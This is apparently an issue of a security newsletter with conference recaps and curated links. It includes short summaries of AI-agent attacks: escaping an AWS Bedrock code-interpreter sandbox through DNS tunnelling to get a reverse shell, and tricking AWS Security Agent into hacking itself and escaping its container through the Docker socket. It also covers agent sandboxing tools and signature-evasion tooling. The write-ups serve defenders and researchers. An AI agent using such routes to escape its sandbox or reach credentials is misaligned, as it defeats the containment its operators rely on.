👨‍💼 I Will Survive

Phew, stay strong my friends, we’re almost through the BSidesSF and RSAC montage ✊ 

Too many to list them all, but some quick thoughts and moments that stuck out:

• Thank you to everyone who come to the inaugural tl;dr sec community meet-up! I had a blast 🥰 Also shout-out to Scott Behrens and Travis McPeak for joining me for a fireside chat.

• Anna Westelius gave an inspiring BSidesSF keynote about reasons for us security folks to be optimistic.

• It was fun joining my friends Ken Johnson, Seth Law, Kevin McDermott, and Astha Singhal on an Absolute AppSec panel at BSidesSF.

• Delicious KBBQ with a bunch of other security creator nerds, H/T Ashish and Shilpi of the Cloud Security Podcast for organizing!

• Huge thanks to Decibel’s Dan Nguyen-Huu and Jon Sakoda for hosting an awesome set of lightning talks, which my bud Daniel Miessler also helped organize. Great talks from Rob Ragan, Jackie Bow, Andrew Becherer, and Sydney Marrone!

  • Dave Aitel choosing the Imperial March from Star Wars as his intro music was delightful 😂 

• Randomly meeting former NSA Director Rob Joyce! H/T Lina Lau, whose company is working on some impactful stuff 👀 

• Hearing from folks who were moved by my talk last BSidesSF about vulnerability 🥹 This had the biggest impact on me.

Sponsor

📣 AI is Expanding Your Attack Surface.
Can You Secure It?

AI adoption is accelerating across cloud environments, from LLMs to autonomous agents and complex data pipelines. But without dedicated AI security posture management (AI-SPM), these innovations introduce a new class of risks that traditional tools can’t address.

From exposed training data to overprivileged AI agents, the attack surface is expanding faster than security teams can keep up.

Download the guide to learn a five-step framework to gain visibility, assess risk and secure AI across your cloud environment.

👉 Download guide 👈

AppSec

ChiChou/vscode-frida
A VSCode extension providing comprehensive IDE for Frida dynamic instrumentation, featuring a sidebar for listing apps/processes on local/USB/remote devices, interactive panels for browsing modules/exports and classes/methods (Java/Objective-C), and one-click hook generation for native functions, ObjC selectors, and Java methods.

How "Strengthening Crypto" Broke Authentication: FreshRSS and bcrypt's 72-Byte Limit
Pentester Lab's Louis Nyffenegger analyzes CVE-2025-68402, an authentication bypass in the development branch of FreshRSS a self-hosted RSS aggregator, caused by a "strengthen crypto" commit that replaced SHA-1 (40 chars) with SHA-256 (64 chars) for nonce generation. The longer nonce, when concatenated with the bcrypt hash before verification, pushed the password-dependent portion of the hash beyond bcrypt's 72-byte truncation limit, meaning password_verify() only checked the nonce plus the algorithm identifier ($2y$10$) and one salt character, none of which depend on the actual password.

"A commit meant to strengthen the crypto ended up removing the need for a valid password." 😱 

Sponsor

📊 Cside Report: The Future of Web Security Depends on the Browser

The browser runtime sits between your website < > customers, bots, AI agents, and fraudsters. No one is watching it. And agents now access websites on behalf of humans, adding the risk of consumer agents being manipulated by script injections from third-party code. Grab this report to see data on: the new threat of locally hosted stealth browsers, a 15x rise in user-action AI agents, 275% increase on discussions of bot traffic, and results of an industry survey on how practitioners are preparing against AI-agent driven website fraud.

👉 Get the Report from Cside 👈

I could definitely see the bar rising for preventing AI-agent driven fraud or bot abuse given improvements in AI + browser use. I’m curious how the secure this new world.

Cloud Security

Quicklinks

• Federal cyber experts called Microsoft’s cloud a “pile of s#!t,” approved it anyway - Deep dive by ProPublica

• AI Remediation Developers Will Actually Use - Every vulnerability tool tells you what's wrong. No one tells you how to actually fix it. Rebuild the image, bump a dependency, or apply a mitigation? The right answer depends on how it's built. Maze AI agents understand your environment and deliver the fix your team would actually use.*

  • This is a nice post on the nuances and challenges of auto-fixing.

• dan-v/cloudshell-store - A distributed file store built on AWS CloudShell's free persistent storage. Chicanery of the highest order 🫡 

^*Sponsored

IAMTrail
AWS silently updates Managed IAM policies all the time. This project by Victor Grenu tracks the full version history and diffs for 1525 AWS Managed IAM Policies, archived since 2019.

Pwning AI Code Interpreters in AWS Bedrock AgentCore
Friend of the newsletter BeyondTrust’s Kinnaird McQuade discovered that the AWS Bedrock AgentCore Interpreter’s Sandbox network mode (“complete isolation with no external access”) does allow public DNS queries. The post walks through using that capability to establish bidirectional communication (command and control, C2) using a custom tunneling protocol via DNS queries and responses, obtain a full interactive reverse shell, exfiltrating data, and performing command execution with the Code Interpreter’s IAM role. GitHub PoC.

Result: "AWS communicated that a fix will not be made and it will change the documentation’s description of sandbox mode instead. AWS awarded the security researcher with a $100 gift card to the AWS Gear Shop." 😂

Inside AWS Security Agent: A multi-agent architecture for automated penetration testing
AWS’ Tamer Alkhouli, Divya Bhargavi, Daniele Bonadiman et al describe how AWS Security Agent works and how they benchmarked it. With CTF instructions and grader checks after each tool call it achieved 92.5% on CVE Bench v2.0, 80% without CTF instructions or grader feedback (more like real-world conditions), and 65% using an LLM whose knowledge cutoff date predates CVE Bench v1.0 release.

See also Sena Yakut’s blog overview on setting up AWS Security Agent and scanning DVWA.

💡 This post actually had a pretty good amount of details and context, nice. I also found it interesting how performance dropped when using an LLM with knowledge cutoff before the CVE Bench release- is it doing better due to “memorizing” the answers or is it just a worse model because it’s older? 🤔 

Pentesting a pentest agent - Here's what I've found in AWS Security Agent
Richard Fan discovered five security vulnerabilities in AWS Security Agent, an autonomous AI pentesting tool, and discusses four of them (the 5th isn’t fixed yet).

1. The DNS confusion bug allowed attackers to manipulate Route53 private hosted zones to trick the agent into pentesting public domains they don't own by exploiting the "Unreachable" domain status and DNS record verification timing.

2. Richard was able to trick the agent into hacking itself, obtaining a reverse shell with root access to the agent sandbox by injecting commands into debug messages, and escaping the container through the mounted /run/docker.sock to access the host EC2 instance and its IAM role credentials.

3. He found the agent sometimes performs unnecessarily destructive actions like using DROP TABLE for SQL injection probes.

4. The agent can expose unredacted passwords in pentest reports.

Supply Chain

Quicklinks

• I’ve been doing BSidesSF/RSA stuff non-stop so I haven’t had time to fully get the lay of the land but it seems like a few things have been on fire. I wonder if the threat actors chose this week due to thinking defenders might be busy at conferences 🤔 Rude!

• Trivy Compromised - By Wiz’s Rami McCarthy

• TeamPCP Compromises LiteLLM: Credential Stealer in PyPI, 70 Repos Exposed - I love how this post by Boost Security's François Proulx emphasizes the collaborative nature of the folks working to detect and respond to these supply chain attacks. More from Semgrep and Datadog.

• HackingLZ/litellm_1.82.8_payload - Defanged malware stages from the litellm 1.82.8 PyPI supply chain compromise — credential stealer, K8s lateral movement, C2 backdoor.

Agent Skills are the New Packages of AI: It's Time to Manage Them Securely
JFrog’s Yonatan Arbel announces their Agent Skills Registry product. Yonatan argues that we should be treating Skills like open source dependencies: version tracking them, scanning them for malicious contents, tracking provenance, etc.

💡Something like this makes a lot of sense to me. We should be taking all of the lessons we’ve learned over time from various package registries and language ecosystems and ideally building them in from the beginning with new things like Skills.

Blue Team

mandiant/speakeasy
By Mandiant: A Windows malware emulation framework that executes binaries, drivers, and shellcode in a modeled Windows runtime instead of a full VM. It emulates APIs, process/thread behavior, filesystem, registry, and network activity so samples can keep moving through realistic execution paths.

FancyBear Exposed: Major OPSEC Blunder Inside Russian Espionage Ops
Ctrl-Alt-Intel discovered an exposed open-directory on a FancyBear (APT28/GRU) C2 server that revealed the group's complete toolkit, telemetry logs, and exfiltrated data from a 500+ day espionage campaign targeting government and military entities across Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia. The exposed server contained 2,800+ exfiltrated emails, 240+ credential sets with TOTP 2FA secrets, and more.

“FancyBear developed a modular, multi-platform exploitation toolkit where a victim simply opening a malicious email - with no further clicks - could result in their credentials stolen, their 2FA bypassed, emails within their mailbox exfiltrated, and a silent forwarding rule established that persists indefinitely.”

Red Team

Islands of Invariance
Rasta Mouse (maybe Rasta Mouse on X, Daniel Duggan?) describes how Crystal Palace now includes an automatic YARA generator that creates signatures based on "islands of invariance" (predictable, unchanged code patterns after optimization).

A scalpel, a hammer, and a foot gun
Raphael Mudge has released ised, a program rewriting tool for Crystal Palace that surgically inserts or replaces code at instruction pattern matches to break content signatures. The tool uses a two-pass implementation with prepend/append/replace buckets and supports specific/generic/mnemonic pattern matching from Crystal Palace's disassembler output.

"A potential outcome is that researchers building tools on this platform may feel quite comfortable releasing Yara rules for all of their capability. It’s no loss, because they and their users would likely have a private ised-cocktail ready to go. What would change in red teaming (or cybersecurity even), if there was no fear of ‘burning a tool’ because of its content tells and behavior was the only meaningful battleground?"

ghostvectoracademy/DLLHijackHunter
By GhostVector Academy: An automated Windows DLL hijacking detection tool that discovers, validates, and confirms exploitable DLL hijack opportunities through a four-phase pipeline: discovery (enumerates binaries across services, scheduled tasks, startup items, COM objects, and AutoElevate UAC bypass vectors), filtration (eliminates false positives through hard and soft gates), canary confirmation (deploys a harmless canary DLL and triggers the binary to prove the hijack works), and scoring (0-100% confidence plus 0-10 impact score based on privilege gained, trigger reliability, and stealth).

AI + Security

NVIDIA/NemoClaw
An open source referencer stack that simplifies running OpenClaw agents inside NVIDIA OpenShell sandboxes with multi-layer security controls including Landlock, seccomp, network namespaces, and policy-enforced egress filtering. More below.

NVIDIA/OpenShell
OpenShell provides a sandboxed execution environment for AI agents that enforces declarative YAML policies to prevent unauthorized file access, data exfiltration, and uncontrolled network activity. The system runs as a K3s cluster inside a single Docker container and applies defense-in-depth across four policy domains: filesystem (read/write restrictions), network (outbound connection control with HTTP method and path-level enforcement), process (privilege escalation blocking), and inference (model API call routing).

OpenShell supports Claude, OpenCode, Codex, OpenClaw, and Ollama agents out of the box and manages credentials as injectable providers that never touch the sandbox filesystem. Security policies are hot-reloadable at runtime for network and inference layers, while filesystem and process restrictions are locked at sandbox creation

IronCurtain: A Personal AI Assistant Built Secure from the Ground Up
Security legend Niels Provos asked himself: How would you build a personal AI assistant if you took security seriously from the start? So he built IronCurtain, which sandboxes LLM-generated code, enforces policy in plain English, and keeps credentials out of the agent's reach.

IronCurtain funnels all actions through a single MCP proxy chokepoint where a policy engine enforces rules written in plain English and compiled to deterministic policies. The system supports two sandbox modes: Code Mode runs LLM-generated TypeScript in isolated V8 with no filesystem/network access, while Docker Mode runs full agents like Claude Code CLI in containers with --network=none where a MITM proxy swaps fake API keys for real ones to maintain credential separation.

The plain-English constitution approach (inspired by Microsoft Research's LEGALEASE) lets users write policies like "agent may read/write files in project directory but must ask before git push" which compile to deterministic allow/deny/escalate rules, with an optional auto-approver that recognizes explicit user intent to reduce alert fatigue.

💡 Really thoughtful, great read. I love the architecture of making sure there’s a single security enforcement point, and how you can ease the burden of writing complex enforcement policies via natural language (but that are still enforced deterministically).

Misc

Feels

• Hugh Grant: "It's been very, very depressing watching Big Tech kidnap their lives, and to see children really finding it very, very difficult to get properly interested in anything that isn't a screen."

• Matthew Hussey - Why Men Don't Open Up These Days...

• HealthyGamerGG - Why Sharing Your Feelings Can Kill Your Relationship 

• Kevin James on Finding Love Later in Life

• Ethan Hawke - The one who’s in love always wins

Misc

• How an unappetizing shrub became dozens of different vegetables - Centuries of selective breeding turned a single wild weed into everything from broccoli to Brussels sprouts. Whoa 🤯 

• Turns out all your Pokémon Go data will be used to train robots - Niantic is using location data collected from Pokémon Go and Ingress players to train Coco Robotics' urban delivery robots.

• rexrodeo/american-healthcare-conundrum - Investigative data journalism: quantifying fixable waste in US healthcare, one issue at a time. Open-source analysis of CMS, OECD, and federal datasets. $98.6B in savings identified so far.

• Zelensky: Russia providing Iran with Shahed drones used against US bases

• How the Turner Twins Are Mythbusting Modern Gear - The twins are A/B testing modern gear by having one dress in cutting-edge technical apparel and the other in 100-year-old heritage kit on the world’s toughest expeditions.

• False claims in a widely-cited paper. No corrections. No consequences. Welcome to the Business School.

• "One Day More," except Waluigi is every part 😂 😂 

• America’s Got Talent - A magician instantly changing her outfit like 8 times

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint

P.S. Feel free to connect with me on LinkedIn 👋